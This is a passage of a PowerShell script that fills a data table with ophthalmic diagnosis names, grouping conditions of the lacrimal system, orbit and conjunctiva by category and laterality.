$DiagnosisList.Rows.Add("Acute dacryocystitis","Acute dacryocystitis of bilateral lacrimal passages") + $null = $DiagnosisList.Rows.Add("Acute dacryocystitis","Acute dacryocystitis of unspecified lacrimal passage") + $null = $DiagnosisList.Rows.Add("Acute lacrimal canaliculitis","Acute lacrimal canaliculitis of right lacrimal passage") + $null = $DiagnosisList.Rows.Add("Acute lacrimal canaliculitis","Acute lacrimal canaliculitis of left lacrimal passage") + $null = $DiagnosisList.Rows.Add("Acute lacrimal canaliculitis","Acute lacrimal canaliculitis of bilateral lacrimal passages") + $null = $DiagnosisList.Rows.Add("Acute lacrimal canaliculitis","Acute lacrimal canaliculitis of unspecified lacrimal passage") + $null = $DiagnosisList.Rows.Add("Chronic dacryocystitis","Chronic dacryocystitis of right lacrimal passage") + $null = $DiagnosisList.Rows.Add("Chronic dacryocystitis","Chronic dacryocystitis of left lacrimal passage") + $null = $DiagnosisList.Rows.Add("Chronic dacryocystitis","Chronic dacryocystitis of bilateral lacrimal passages") + $null = $DiagnosisList.Rows.Add("Chronic dacryocystitis","Chronic dacryocystitis of unspecified lacrimal passage") + $null = $DiagnosisList.Rows.Add("Chronic lacrimal canaliculitis","Chronic lacrimal canaliculitis of right lacrimal passage") + $null = $DiagnosisList.Rows.Add("Chronic lacrimal canaliculitis","Chronic lacrimal canaliculitis of left lacrimal passage") + $null = $DiagnosisList.Rows.Add("Chronic lacrimal canaliculitis","Chronic lacrimal canaliculitis of bilateral lacrimal passages") + $null = $DiagnosisList.Rows.Add("Chronic lacrimal canaliculitis","Chronic lacrimal canaliculitis of unspecified lacrimal passage") + $null = $DiagnosisList.Rows.Add("Chronic lacrimal mucocele","Chronic lacrimal mucocele of right lacrimal passage") + $null = $DiagnosisList.Rows.Add("Chronic lacrimal mucocele","Chronic lacrimal mucocele of left lacrimal passage") + $null = $DiagnosisList.Rows.Add("Chronic lacrimal mucocele","Chronic lacrimal mucocele of bilateral lacrimal passages") + $null = $DiagnosisList.Rows.Add("Chronic lacrimal mucocele","Chronic lacrimal mucocele of unspecified lacrimal passage") + $null = $DiagnosisList.Rows.Add("Dacryolith","Dacryolith of right lacrimal passage") + $null = $DiagnosisList.Rows.Add("Dacryolith","Dacryolith of left lacrimal passage") + $null = $DiagnosisList.Rows.Add("Dacryolith","Dacryolith of bilateral lacrimal passages") + $null = $DiagnosisList.Rows.Add("Dacryolith","Dacryolith of unspecified lacrimal passage") + $null = $DiagnosisList.Rows.Add("Eversion of lacrimal punctum","Eversion of right lacrimal punctum") + $null = $DiagnosisList.Rows.Add("Eversion of lacrimal punctum","Eversion of left lacrimal punctum") + $null = $DiagnosisList.Rows.Add("Eversion of lacrimal punctum","Eversion of bilateral lacrimal punctum") + $null = $DiagnosisList.Rows.Add("Eversion of lacrimal punctum","Eversion of unspecified lacrimal punctum") + $null = $DiagnosisList.Rows.Add("Neonatal obstruction of nasolacrimal duct","Neonatal obstruction of right nasolacrimal duct") + $null = $DiagnosisList.Rows.Add("Neonatal obstruction of nasolacrimal duct","Neonatal obstruction of left nasolacrimal duct") + $null = $DiagnosisList.Rows.Add("Neonatal obstruction of nasolacrimal duct","Neonatal obstruction of bilateral nasolacrimal duct") + $null = $DiagnosisList.Rows.Add("Neonatal obstruction of nasolacrimal duct","Neonatal obstruction of unspecified nasolacrimal duct") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal canaliculi","Stenosis of right lacrimal canaliculi") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal canaliculi","Stenosis of left lacrimal canaliculi") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal canaliculi","Stenosis of bilateral lacrimal canaliculi") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal canaliculi","Stenosis of unspecified lacrimal canaliculi") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of nasolacrimal duct","Acquired stenosis of right nasolacrimal duct") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of nasolacrimal duct","Acquired stenosis of left nasolacrimal duct") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of nasolacrimal duct","Acquired stenosis of bilateral nasolacrimal duct") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of nasolacrimal duct","Acquired stenosis of unspecified nasolacrimal duct") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal punctum","Stenosis of right lacrimal punctum") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal punctum","Stenosis of left lacrimal punctum") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal punctum","Stenosis of bilateral lacrimal punctum") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal punctum","Stenosis of unspecified lacrimal punctum") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal sac","Stenosis of right lacrimal sac") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal sac","Stenosis of left lacrimal sac") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal sac","Stenosis of bilateral lacrimal sac") + $null = $DiagnosisList.Rows.Add("Stenosis of lacrimal sac","Stenosis of unspecified lacrimal sac") + $null = $DiagnosisList.Rows.Add("Lacrimal fistula","Lacrimal fistula right lacrimal passage") + $null = $DiagnosisList.Rows.Add("Lacrimal fistula","Lacrimal fistula left lacrimal passage") + $null = $DiagnosisList.Rows.Add("Lacrimal fistula","Lacrimal fistula bilateral lacrimal passages") + $null = $DiagnosisList.Rows.Add("Lacrimal fistula","Lacrimal fistula unspecified lacrimal passage") + $null = $DiagnosisList.Rows.Add("Other changes of lacrimal passages","Other changes of lacrimal passages") + $null = $DiagnosisList.Rows.Add("Granuloma of lacrimal passages","Granuloma of right lacrimal passage") + $null = $DiagnosisList.Rows.Add("Granuloma of lacrimal passages","Granuloma of left lacrimal passage") + $null = $DiagnosisList.Rows.Add("Granuloma of lacrimal passages","Granuloma of bilateral lacrimal passages") + $null = $DiagnosisList.Rows.Add("Granuloma of lacrimal passages","Granuloma of unspecified lacrimal passage") + $null = $DiagnosisList.Rows.Add("Other disorders of lacrimal system","Other disorders of lacrimal system") + $null = $DiagnosisList.Rows.Add("Disorder of lacrimal system, unspecified","Disorder of lacrimal system, unspecified") + $null = $DiagnosisList.Rows.Add("Acute inflammation of orbit","Unspecified acute inflammation of orbit") + $null = $DiagnosisList.Rows.Add("Cellulitis of orbit","Cellulitis of right orbit") + $null = $DiagnosisList.Rows.Add("Cellulitis of orbit","Cellulitis of left orbit") + $null = $DiagnosisList.Rows.Add("Cellulitis of orbit","Cellulitis of bilateral orbits") + $null = $DiagnosisList.Rows.Add("Cellulitis of orbit","Cellulitis of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of orbit","Osteomyelitis of right orbit") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of orbit","Osteomyelitis of left orbit") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of orbit","Osteomyelitis of bilateral orbits") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of orbit","Osteomyelitis of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Periostitis of orbit","Periostitis of right orbit") + $null = $DiagnosisList.Rows.Add("Periostitis of orbit","Periostitis of left orbit") + $null = $DiagnosisList.Rows.Add("Periostitis of orbit","Periostitis of bilateral orbits") + $null = $DiagnosisList.Rows.Add("Periostitis of orbit","Periostitis of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Tenonitis of orbit","Tenonitis of right orbit") + $null = $DiagnosisList.Rows.Add("Tenonitis of orbit","Tenonitis of left orbit") + $null = $DiagnosisList.Rows.Add("Tenonitis of orbit","Tenonitis of bilateral orbits") + $null = $DiagnosisList.Rows.Add("Tenonitis of orbit","Tenonitis of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Chronic inflammatory disorders of orbit","Unspecified chronic inflammatory disorders of orbit") + $null = $DiagnosisList.Rows.Add("Granuloma of orbit","Granuloma of right orbit") + $null = $DiagnosisList.Rows.Add("Granuloma of orbit","Granuloma of left orbit") + $null = $DiagnosisList.Rows.Add("Granuloma of orbit","Granuloma of bilateral orbits") + $null = $DiagnosisList.Rows.Add("Granuloma of orbit","Granuloma of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Orbital myositis","Orbital myositis, right orbit") + $null = $DiagnosisList.Rows.Add("Orbital myositis","Orbital myositis, left orbit") + $null = $DiagnosisList.Rows.Add("Orbital myositis","Orbital myositis, bilateral") + $null = $DiagnosisList.Rows.Add("Orbital myositis","Orbital myositis, unspecified orbit") + $null = $DiagnosisList.Rows.Add("Exophthalmic conditions","Unspecified exophthalmos") + $null = $DiagnosisList.Rows.Add("Displacement (lateral) of globe","Displacement (lateral) of globe, right eye") + $null = $DiagnosisList.Rows.Add("Displacement (lateral) of globe","Displacement (lateral) of globe, left eye") + $null = $DiagnosisList.Rows.Add("Displacement (lateral) of globe","Displacement (lateral) of globe, bilateral") + $null = $DiagnosisList.Rows.Add("Displacement (lateral) of globe","Displacement (lateral) of globe, unspecified eye") + $null = $DiagnosisList.Rows.Add("Edema of orbit","Edema of right orbit") + $null = $DiagnosisList.Rows.Add("Edema of orbit","Edema of left orbit") + $null = $DiagnosisList.Rows.Add("Edema of orbit","Edema of bilateral orbit") + $null = $DiagnosisList.Rows.Add("Edema of orbit","Edema of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Hemorrhage of orbit","Hemorrhage of right orbit") + $null = $DiagnosisList.Rows.Add("Hemorrhage of orbit","Hemorrhage of left orbit") + $null = $DiagnosisList.Rows.Add("Hemorrhage of orbit","Hemorrhage of bilateral orbit") + $null = $DiagnosisList.Rows.Add("Hemorrhage of orbit","Hemorrhage of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Constant exophthalmos","Constant exophthalmos, right eye") + $null = $DiagnosisList.Rows.Add("Constant exophthalmos","Constant exophthalmos, left eye") + $null = $DiagnosisList.Rows.Add("Constant exophthalmos","Constant exophthalmos, bilateral") + $null = $DiagnosisList.Rows.Add("Constant exophthalmos","Constant exophthalmos, unspecified eye") + $null = $DiagnosisList.Rows.Add("Intermittent exophthalmos","Intermittent exophthalmos, right eye") + $null = $DiagnosisList.Rows.Add("Intermittent exophthalmos","Intermittent exophthalmos, left eye") + $null = $DiagnosisList.Rows.Add("Intermittent exophthalmos","Intermittent exophthalmos, bilateral") + $null = $DiagnosisList.Rows.Add("Intermittent exophthalmos","Intermittent exophthalmos, unspecified eye") + $null = $DiagnosisList.Rows.Add("Pulsating exophthalmos","Pulsating exophthalmos, right eye") + $null = $DiagnosisList.Rows.Add("Pulsating exophthalmos","Pulsating exophthalmos, left eye") + $null = $DiagnosisList.Rows.Add("Pulsating exophthalmos","Pulsating exophthalmos, bilateral") + $null = $DiagnosisList.Rows.Add("Pulsating exophthalmos","Pulsating exophthalmos, unspecified eye") + $null = $DiagnosisList.Rows.Add("Deformity of orbit","Unspecified deformity of orbit") + $null = $DiagnosisList.Rows.Add("Atrophy of orbit","Atrophy of right orbit") + $null = $DiagnosisList.Rows.Add("Atrophy of orbit","Atrophy of left orbit") + $null = $DiagnosisList.Rows.Add("Atrophy of orbit","Atrophy of bilateral orbit") + $null = $DiagnosisList.Rows.Add("Atrophy of orbit","Atrophy of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Deformity of orbit due to bone disease","Deformity of right orbit due to bone disease") + $null = $DiagnosisList.Rows.Add("Deformity of orbit due to bone disease","Deformity of left orbit due to bone disease") + $null = $DiagnosisList.Rows.Add("Deformity of orbit due to bone disease","Deformity of bilateral orbits due to bone disease") + $null = $DiagnosisList.Rows.Add("Deformity of orbit due to bone disease","Deformity of unspecified orbit due to bone disease") + $null = $DiagnosisList.Rows.Add("Deformity of orbit due to trauma or surgery","Deformity of right orbit due to trauma or surgery") + $null = $DiagnosisList.Rows.Add("Deformity of orbit due to trauma or surgery","Deformity of left orbit due to trauma or surgery") + $null = $DiagnosisList.Rows.Add("Deformity of orbit due to trauma or surgery","Deformity of bilateral orbits due to trauma or surgery") + $null = $DiagnosisList.Rows.Add("Deformity of orbit due to trauma or surgery","Deformity of unspecified orbit due to trauma or surgery") + $null = $DiagnosisList.Rows.Add("Enlargement of orbit","Enlargement of right orbit") + $null = $DiagnosisList.Rows.Add("Enlargement of orbit","Enlargement of left orbit") + $null = $DiagnosisList.Rows.Add("Enlargement of orbit","Enlargement of bilateral orbits") + $null = $DiagnosisList.Rows.Add("Enlargement of orbit","Enlargement of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Exostosis of orbit","Exostosis of right orbit") + $null = $DiagnosisList.Rows.Add("Exostosis of orbit","Exostosis of left orbit") + $null = $DiagnosisList.Rows.Add("Exostosis of orbit","Exostosis of bilateral orbits") + $null = $DiagnosisList.Rows.Add("Exostosis of orbit","Exostosis of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Unspecified enophthalmos","Unspecified enophthalmos, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified enophthalmos","Unspecified enophthalmos, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified enophthalmos","Unspecified enophthalmos, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified enophthalmos","Unspecified enophthalmos, unspecified eye") + $null = $DiagnosisList.Rows.Add("Enophthalmos due to atrophy of orbital tissue","Enophthalmos due to atrophy of orbital tissue, right eye") + $null = $DiagnosisList.Rows.Add("Enophthalmos due to atrophy of orbital tissue","Enophthalmos due to atrophy of orbital tissue, left eye") + $null = $DiagnosisList.Rows.Add("Enophthalmos due to atrophy of orbital tissue","Enophthalmos due to atrophy of orbital tissue, bilateral") + $null = $DiagnosisList.Rows.Add("Enophthalmos due to atrophy of orbital tissue","Enophthalmos due to atrophy of orbital tissue, unspecified eye") + $null = $DiagnosisList.Rows.Add("Enophthalmos due to trauma or surgery","Enophthalmos due to trauma or surgery, right eye") + $null = $DiagnosisList.Rows.Add("Enophthalmos due to trauma or surgery","Enophthalmos due to trauma or surgery, left eye") + $null = $DiagnosisList.Rows.Add("Enophthalmos due to trauma or surgery","Enophthalmos due to trauma or surgery, bilateral") + $null = $DiagnosisList.Rows.Add("Enophthalmos due to trauma or surgery","Enophthalmos due to trauma or surgery, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (old) foreign body following penetrating wound of orbit","Retained (old) foreign body following penetrating wound of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Retained (old) foreign body following penetrating wound of orbit","Retained (old) foreign body following penetrating wound of right orbit") + $null = $DiagnosisList.Rows.Add("Retained (old) foreign body following penetrating wound of orbit","Retained (old) foreign body following penetrating wound of left orbit") + $null = $DiagnosisList.Rows.Add("Retained (old) foreign body following penetrating wound of orbit","Retained (old) foreign body following penetrating wound of bilateral orbits") + $null = $DiagnosisList.Rows.Add("Cyst of orbit","Cyst of right orbit") + $null = $DiagnosisList.Rows.Add("Cyst of orbit","Cyst of left orbit") + $null = $DiagnosisList.Rows.Add("Cyst of orbit","Cyst of bilateral orbits") + $null = $DiagnosisList.Rows.Add("Cyst of orbit","Cyst of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Myopathy of extraocular muscles","Myopathy of extraocular muscles, right orbit") + $null = $DiagnosisList.Rows.Add("Myopathy of extraocular muscles","Myopathy of extraocular muscles, left orbit") + $null = $DiagnosisList.Rows.Add("Myopathy of extraocular muscles","Myopathy of extraocular muscles, bilateral") + $null = $DiagnosisList.Rows.Add("Myopathy of extraocular muscles","Myopathy of extraocular muscles, unspecified orbit") + $null = $DiagnosisList.Rows.Add("Other disorders of orbit","Other disorders of orbit") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of orbit","Unspecified disorder of orbit") + $null = $DiagnosisList.Rows.Add("Acute follicular conjunctivitis","Acute follicular conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Acute follicular conjunctivitis","Acute follicular conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Acute follicular conjunctivitis","Acute follicular conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Acute follicular conjunctivitis","Acute follicular conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other mucopurulent conjunctivitis","Other mucopurulent conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Other mucopurulent conjunctivitis","Other mucopurulent conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Other mucopurulent conjunctivitis","Other mucopurulent conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Other mucopurulent conjunctivitis","Other mucopurulent conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Acute atopic conjunctivitis","Acute atopic conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Acute atopic conjunctivitis","Acute atopic conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Acute atopic conjunctivitis","Acute atopic conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Acute atopic conjunctivitis","Acute atopic conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Acute toxic conjunctivitis","Acute toxic conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Acute toxic conjunctivitis","Acute toxic conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Acute toxic conjunctivitis","Acute toxic conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Acute toxic conjunctivitis","Acute toxic conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Pseudomembranous conjunctivitis","Pseudomembranous conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Pseudomembranous conjunctivitis","Pseudomembranous conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Pseudomembranous conjunctivitis","Pseudomembranous conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Pseudomembranous conjunctivitis","Pseudomembranous conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Serous conjunctivitis, except viral","Serous conjunctivitis, except viral, right eye") + $null = $DiagnosisList.Rows.Add("Serous conjunctivitis, except viral","Serous conjunctivitis, except viral, left eye") + $null = $DiagnosisList.Rows.Add("Serous conjunctivitis, except viral","Serous conjunctivitis, except viral, bilateral") + $null = $DiagnosisList.Rows.Add("Serous conjunctivitis, except viral","Serous conjunctivitis, except viral, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified acute conjunctivitis","Unspecified acute conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified acute conjunctivitis","Unspecified acute conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified acute conjunctivitis","Unspecified acute conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified acute conjunctivitis","Unspecified acute conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified chronic conjunctivitis","Unspecified chronic conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified chronic conjunctivitis","Unspecified chronic conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified chronic conjunctivitis","Unspecified chronic conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified chronic conjunctivitis","Unspecified chronic conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Chronic giant papillary conjunctivitis","Chronic giant papillary conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Chronic giant papillary conjunctivitis","Chronic giant papillary conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Chronic giant papillary conjunctivitis","Chronic giant papillary conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic giant papillary conjunctivitis","Chronic giant papillary conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Simple chronic conjunctivitis","Simple chronic conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Simple chronic conjunctivitis","Simple chronic conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Simple chronic conjunctivitis","Simple chronic conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Simple chronic conjunctivitis","Simple chronic conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Chronic follicular conjunctivitis","Chronic follicular conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Chronic follicular conjunctivitis","Chronic follicular conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Chronic follicular conjunctivitis","Chronic follicular conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic follicular conjunctivitis","Chronic follicular conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Vernal conjunctivitis","Vernal conjunctivitis") + $null = $DiagnosisList.Rows.Add("Other chronic allergic conjunctivitis","Other chronic allergic conjunctivitis") + $null = $DiagnosisList.Rows.Add("Unspecified blepharoconjunctivitis","Unspecified blepharoconjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified blepharoconjunctivitis","Unspecified blepharoconjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified blepharoconjunctivitis","Unspecified blepharoconjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified blepharoconjunctivitis","Unspecified blepharoconjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Ligneous conjunctivitis","Ligneous conjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Ligneous conjunctivitis","Ligneous conjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Ligneous conjunctivitis","Ligneous conjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Ligneous conjunctivitis","Ligneous conjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Angular blepharoconjunctivitis","Angular blepharoconjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Angular blepharoconjunctivitis","Angular blepharoconjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Angular blepharoconjunctivitis","Angular blepharoconjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Angular blepharoconjunctivitis","Angular blepharoconjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Contact blepharoconjunctivitis","Contact blepharoconjunctivitis, right eye") + $null = $DiagnosisList.Rows.Add("Contact blepharoconjunctivitis","Contact blepharoconjunctivitis, left eye") + $null = $DiagnosisList.Rows.Add("Contact blepharoconjunctivitis","Contact blepharoconjunctivitis, bilateral") + $null = $DiagnosisList.Rows.Add("Contact blepharoconjunctivitis","Contact blepharoconjunctivitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Pingueculitis","Pingueculitis, right eye") + $null = $DiagnosisList.Rows.Add("Pingueculitis","Pingueculitis, left eye") + $null = $DiagnosisList.Rows.Add("Pingueculitis","Pingueculitis, bilateral") + $null = $DiagnosisList.Rows.Add("Pingueculitis","Pingueculitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other conjunctivitis","Other conjunctivitis") + $null = $DiagnosisList.Rows.Add("Unspecified conjunctivitis","Unspecified conjunctivitis") + $null = $DiagnosisList.Rows.Add("Unspecified pterygium of eye","Unspecified pterygium of right eye") + $null = $DiagnosisList.Rows.Add("Unspecified pterygium of eye","Unspecified pterygium of left eye") + $null = $DiagnosisList.Rows.Add("Unspecified pterygium of eye","Unspecified pterygium of eye, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified pterygium of eye","Unspecified pterygium of unspecified eye") + $null = $DiagnosisList.Rows.Add("Amyloid pterygium","Amyloid pterygium of right eye") + $null = $DiagnosisList.Rows.Add("Amyloid pterygium","Amyloid pterygium of left eye") + $null = $DiagnosisList.Rows.Add("Amyloid pterygium","Amyloid pterygium of eye, bilateral") + $null = $DiagnosisList.Rows.Add("Amyloid pterygium","Amyloid pterygium of unspecified eye") + $null = $DiagnosisList.Rows.Add("Central pterygium of eye","Central pterygium of right eye") + $null = $DiagnosisList.Rows.Add("Central pterygium of eye","Central pterygium of left eye") + $null = $DiagnosisList.Rows.Add("Central pterygium of eye","Central pterygium of eye, bilateral") + $null = $DiagnosisList.Rows.Add("Central pterygium of eye","Central pterygium of unspecified eye") + $null = $DiagnosisList.Rows.Add("Double pterygium of eye","Double pterygium of right eye") + $null = $DiagnosisList.Rows.Add("Double pterygium of eye","Double pterygium of left eye") + $null = $DiagnosisList.Rows.Add("Double pterygium of eye","Double pterygium of eye, bilateral") + $null = $DiagnosisList.Rows.Add("Double pterygium of eye","Double pterygium of unspecified eye") + $null = $DiagnosisList.Rows.Add("Peripheral pterygium of eye, stationary","Peripheral pterygium, stationary, right eye") + $null = $DiagnosisList.Rows.Add("Peripheral pterygium of eye, stationary","Peripheral pterygium, stationary, left eye") + $null = $DiagnosisList.Rows.Add("Peripheral pterygium of eye, stationary","Peripheral pterygium, stationary, bilateral") + $null = $DiagnosisList.Rows.Add("Peripheral pterygium of eye, stationary","Peripheral pterygium, stationary, unspecified eye") + $null = $DiagnosisList.Rows.Add("Peripheral pterygium of eye, progressive","Peripheral pterygium, progressive, right eye") + $null = $DiagnosisList.Rows.Add("Peripheral pterygium of eye, progressive","Peripheral pterygium, progressive, left eye") + $null = $DiagnosisList.Rows.Add("Peripheral pterygium of eye, progressive","Peripheral pterygium, progressive, bilateral") + $null = $DiagnosisList.Rows.Add("Peripheral pterygium of eye, progressive","Peripheral pterygium, progressive, unspecified eye") + $null = $DiagnosisList.Rows.Add("Recurrent pterygium of eye","Recurrent pterygium of right eye") + $null = $DiagnosisList.Rows.Add("Recurrent pterygium of eye","Recurrent pterygium of left eye") + $null = $DiagnosisList.Rows.Add("Recurrent pterygium of eye","Recurrent pterygium of eye, bilateral") + $null = $DiagnosisList.Rows.Add("Recurrent pterygium of eye","Recurrent pterygium of unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival degenerations and deposits","Unspecified conjunctival degenerations") + $null = $DiagnosisList.Rows.Add("Conjunctival deposits","Conjunctival deposits, right eye") + $null = $DiagnosisList.Rows.Add("Conjunctival deposits","Conjunctival deposits, left eye") + $null = $DiagnosisList.Rows.Add("Conjunctival deposits","Conjunctival deposits, bilateral") + $null = $DiagnosisList.Rows.Add("Conjunctival deposits","Conjunctival deposits, unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival concretions","Conjunctival concretions, right eye") + $null = $DiagnosisList.Rows.Add("Conjunctival concretions","Conjunctival concretions, left eye") + $null = $DiagnosisList.Rows.Add("Conjunctival concretions","Conjunctival concretions, bilateral") + $null = $DiagnosisList.Rows.Add("Conjunctival concretions","Conjunctival concretions, unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival pigmentations","Conjunctival pigmentations, right eye") + $null = $DiagnosisList.Rows.Add("Conjunctival pigmentations","Conjunctival pigmentations, left eye") + $null = $DiagnosisList.Rows.Add("Conjunctival pigmentations","Conjunctival pigmentations, bilateral") + $null = $DiagnosisList.Rows.Add("Conjunctival pigmentations","Conjunctival pigmentations, unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival xerosis, unspecified","Conjunctival xerosis, unspecified, right eye") + $null = $DiagnosisList.Rows.Add("Conjunctival xerosis, unspecified","Conjunctival xerosis, unspecified, left eye") + $null = $DiagnosisList.Rows.Add("Conjunctival xerosis, unspecified","Conjunctival xerosis, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Conjunctival xerosis, unspecified","Conjunctival xerosis, unspecified, unspecified eye") + $null = $DiagnosisList.Rows.Add("Pinguecula","Pinguecula, right eye") + $null = $DiagnosisList.Rows.Add("Pinguecula","Pinguecula, left eye") + $null = $DiagnosisList.Rows.Add("Pinguecula","Pinguecula, bilateral") + $null = $DiagnosisList.Rows.Add("Pinguecula","Pinguecula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival adhesions and strands (localized)","Conjunctival adhesions and strands (localized), right eye") + $null = $DiagnosisList.Rows.Add("Conjunctival adhesions and strands (localized)","Conjunctival adhesions and strands (localized), left eye") + $null = $DiagnosisList.Rows.Add("Conjunctival adhesions and strands (localized)","Conjunctival adhesions and strands (localized), bilateral") + $null = $DiagnosisList.Rows.Add("Conjunctival adhesions and strands (localized)","Conjunctival adhesions and strands (localized), unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival granuloma","Conjunctival granuloma, right eye") + $null = $DiagnosisList.Rows.Add("Conjunctival granuloma","Conjunctival granuloma, left eye") + $null = $DiagnosisList.Rows.Add("Conjunctival granuloma","Conjunctival granuloma, bilateral") + $null = $DiagnosisList.Rows.Add("Conjunctival granuloma","Conjunctival granuloma, unspecified") + $null = $DiagnosisList.Rows.Add("Symblepharon","Symblepharon, right eye") + $null = $DiagnosisList.Rows.Add("Symblepharon","Symblepharon, left eye") + $null = $DiagnosisList.Rows.Add("Symblepharon","Symblepharon, bilateral") + $null = $DiagnosisList.Rows.Add("Symblepharon","Symblepharon, unspecified eye") + $null = $DiagnosisList.Rows.Add("Scarring of conjunctiva","Scarring of conjunctiva, right eye") + $null = $DiagnosisList.Rows.Add("Scarring of conjunctiva","Scarring of conjunctiva, left eye") + $null = $DiagnosisList.Rows.Add("Scarring of conjunctiva","Scarring of conjunctiva, bilateral") + $null = $DiagnosisList.Rows.Add("Scarring of conjunctiva","Scarring of conjunctiva, unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival hemorrhage","Conjunctival hemorrhage, unspecified eye") + $null = $DiagnosisList.Rows.Add("Conjunctival hemorrhage","Conjunctival hemorrhage, right eye") + $null = $DiagnosisList.Rows.Add("Conjunctival hemorrhage","Conjunctival hemorrhage, left eye") + $null = $DiagnosisList.Rows.Add("Conjunctival hemorrhage","Conjunctival hemorrhage, bilateral") + $null = $DiagnosisList.Rows.Add("Vascular abnormalities of conjunctiva","Vascular abnormalities of conjunctiva, right eye") + $null = $DiagnosisList.Rows.Add("Vascular abnormalities of conjunctiva","Vascular abnormalities of conjunctiva, left eye") + $null = $DiagnosisList.Rows.Add("Vascular abnormalities of conjunctiva","Vascular 